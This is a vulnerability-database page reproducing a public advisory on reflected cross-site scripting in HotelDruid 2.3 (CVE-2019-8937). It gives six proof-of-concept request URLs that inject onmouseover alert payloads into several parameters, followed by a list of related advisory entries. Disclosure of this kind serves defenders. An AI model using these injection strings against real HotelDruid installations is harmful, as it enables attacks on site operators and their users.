Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMehmet EmirogluPACKETSTORM:151779
HistoryFeb 20, 2019 - 12:00 a.m.

HotelDruid 2.3 Cross Site Scripting

2019-02-2000:00:00
Mehmet Emiroglu
packetstormsecurity.com
66

0.005 Low

EPSS

Percentile

75.9%

JSON
`===========================================================================================  
# Exploit Title: Hoteldruid 2.3 - 'nsextt' XSS Injection  
# CVE: CVE-2019-8937  
# Date: 18-02-2019  
# Exploit Author: Mehmet EMIROGLU  
# Vendor Homepage: https://sourceforge.net/projects/hoteldruid/  
# Software Link: https://sourceforge.net/projects/hoteldruid/  
# Version: v2.3  
# Category: Webapps  
# Tested on: Wamp64, @Win  
# Software description: HotelDruid is a property management system (PMS)  
designed to make hotel and hostel rooms  
bed and breakfast apartments, or any other kind of daily rental easy to  
manage from a web browser.  
===========================================================================================  
# POC - XSS  
# Parameters : nsextt  
# Attack Pattern : x%22+onmouseover%3dalert(0x000981)+x%3d%22  
# GET Request : http://localhost/hoteldruid/visualizza_tabelle.php?nsextt=x"  
onmouseover=alert(0x000981) x="  
===========================================================================================  
###########################################################################################  
===========================================================================================  
# Exploit Title: Hoteldruid 2.3 - 'cambia1' XSS Injection  
# CVE: CVE-2019-8937  
# Date: 18-02-2019  
# Exploit Author: Mehmet EMIROGLU  
# Vendor Homepage: https://sourceforge.net/projects/hoteldruid/  
# Software Link: https://sourceforge.net/projects/hoteldruid/  
# Version: v2.3  
# Category: Webapps  
# Tested on: Wamp64, @Win  
# Software description: HotelDruid is a property management system (PMS)  
designed to make hotel and hostel rooms  
bed and breakfast apartments, or any other kind of daily rental easy to  
manage from a web browser.  
===========================================================================================  
# POC - XSS  
# Parameters : cambia1  
# Attack Pattern : " onmouseover="alert(8562604)  
# POST Request :  
http://localhost/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671"  
onmouseover="alert(8562604)  
# https://i.hizliresim.com/6avvoE.jpg  
===========================================================================================  
###########################################################################################  
===========================================================================================  
# Exploit Title: Hoteldruid 2.3 - 'mese_fine' XSS Injection  
# CVE: CVE-2019-8937  
# Date: 18-02-2019  
# Exploit Author: Mehmet EMIROGLU  
# Vendor Homepage: https://sourceforge.net/projects/hoteldruid/  
# Software Link: https://sourceforge.net/projects/hoteldruid/  
# Version: v2.3  
# Category: Webapps  
# Tested on: Wamp64, @Win  
# Software description: HotelDruid is a property management system (PMS)  
designed to make hotel and hostel rooms  
bed and breakfast apartments, or any other kind of daily rental easy to  
manage from a web browser.  
===========================================================================================  
# POC - XSS  
# Parameters : mese_fine  
# Attack Pattern : " onmouseover="alert(6520859)  
# POST Request :  
http://localhost/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=periodi&mese_fine=13"  
onmouseover="alert(6520859)  
# https://i.hizliresim.com/v6NAzD.jpg  
===========================================================================================  
###########################################################################################  
===========================================================================================  
# Exploit Title: Hoteldruid 2.3 - 'origine' XSS Injection  
# CVE: CVE-2019-8937  
# Date: 18-02-2019  
# Exploit Author: Mehmet EMIROGLU  
# Vendor Homepage: https://sourceforge.net/projects/hoteldruid/  
# Software Link: https://sourceforge.net/projects/hoteldruid/  
# Version: v2.3  
# Category: Webapps  
# Tested on: Wamp64, @Win  
# Software description: HotelDruid is a property management system (PMS)  
designed to make hotel and hostel rooms  
bed and breakfast apartments, or any other kind of daily rental easy to  
manage from a web browser.  
===========================================================================================  
# POC - XSS  
# Parameters : origine  
# Attack Pattern : " onmouseover="alert(8987004))  
# POST Request :  
http://localhost/hoteldruid/personalizza.php?anno=2019&id_sessione=&aggiorna_qualcosa=SI&cambianumerotariffe=1&nuovo_numero_tariffe=8&origine=./creaprezzi.php"  
onmouseover="alert(8987004)  
# https://i.hizliresim.com/v6NAmO.jpg  
===========================================================================================  
###########################################################################################  
===========================================================================================  
# Exploit Title: Hoteldruid 2.3 - 'anno' XSS Injection  
# CVE: CVE-2019-8937  
# Date: 18-02-2019  
# Exploit Author: Mehmet EMIROGLU  
# Vendor Homepage: https://sourceforge.net/projects/hoteldruid/  
# Software Link: https://sourceforge.net/projects/hoteldruid/  
# Version: v2.3  
# Category: Webapps  
# Tested on: Wamp64, @Win  
# Software description: HotelDruid is a property management system (PMS)  
designed to make hotel and hostel rooms  
bed and breakfast apartments, or any other kind of daily rental easy to  
manage from a web browser.  
===========================================================================================  
# POC - XSS  
# Parameters : anno  
# Attack Pattern : " onmouseover="alert(1548690)  
# POST Request :  
http://localhost/hoteldruid/tabella3.php?id_sessione=&mese=01&tutti_mesi=1&anno=2019"  
onmouseover="alert(1548690)  
# https://i.hizliresim.com/EmAW68.jpg  
===========================================================================================  
###########################################################################################  
===========================================================================================  
# Exploit Title: Hoteldruid 2.3 - 'origine' XSS Injection  
# CVE: CVE-2019-8937  
# Date: 18-02-2019  
# Exploit Author: Mehmet EMIROGLU  
# Vendor Homepage: https://sourceforge.net/projects/hoteldruid/  
# Software Link: https://sourceforge.net/projects/hoteldruid/  
# Version: v2.3  
# Category: Webapps  
# Tested on: Wamp64, @Win  
# Software description: HotelDruid is a property management system (PMS)  
designed to make hotel and hostel rooms  
bed and breakfast apartments, or any other kind of daily rental easy to  
manage from a web browser.  
===========================================================================================  
# POC - XSS  
# Parameters : origine  
# Attack Pattern : " onmouseover="alert(6332576)  
# POST Request :  
http://localhost/hoteldruid/creaprezzi.php?anno=2019&id_sessione=&ins_rapido_costo=SI&tipocostoagg=perm_min&origine=crearegole.php"  
onmouseover="alert(6332576)  
# https://i.hizliresim.com/EmAW68.jpg  
===========================================================================================  
`

Related

prion 1
nvd 1
exploitpack 1
cvelist 1
debiancve 1
zdt 1
cve 1
ubuntucve 1
nuclei 1
exploitdb 1
prion
prion
Design/Logic Flaw
2019-05-17 15:29:00
nvd
nvd
CVE-2019-8937
2019-05-17 15:29:00
exploitpack
exploitpack
HotelDruid 2.3 - Cross-Site Scripting
2019-02-20 00:00:00
cvelist
cvelist
CVE-2019-8937
2019-05-17 14:55:56
debiancve
debiancve
CVE-2019-8937
2019-05-17 15:29:00
zdt
zdt
HotelDruid 2.3 - Cross-Site Scripting Vulnerability
2019-02-20 00:00:00
cve
cve
CVE-2019-8937
2019-05-17 15:29:00
ubuntucve
ubuntucve
CVE-2019-8937
2019-05-17 00:00:00
nuclei
nuclei
HotelDruid 2.3.0 - Cross-Site Scripting
2021-08-24 00:27:13
exploitdb
exploitdb
HotelDruid 2.3 - Cross-Site Scripting
2019-02-20 00:00:00

0.005 Low

EPSS

Percentile

75.9%

JSON
Related for PACKETSTORM:151779
prion1nvd1exploitpack1cvelist1debiancve1zdt1cve1ubuntucve1nuclei1exploitdb1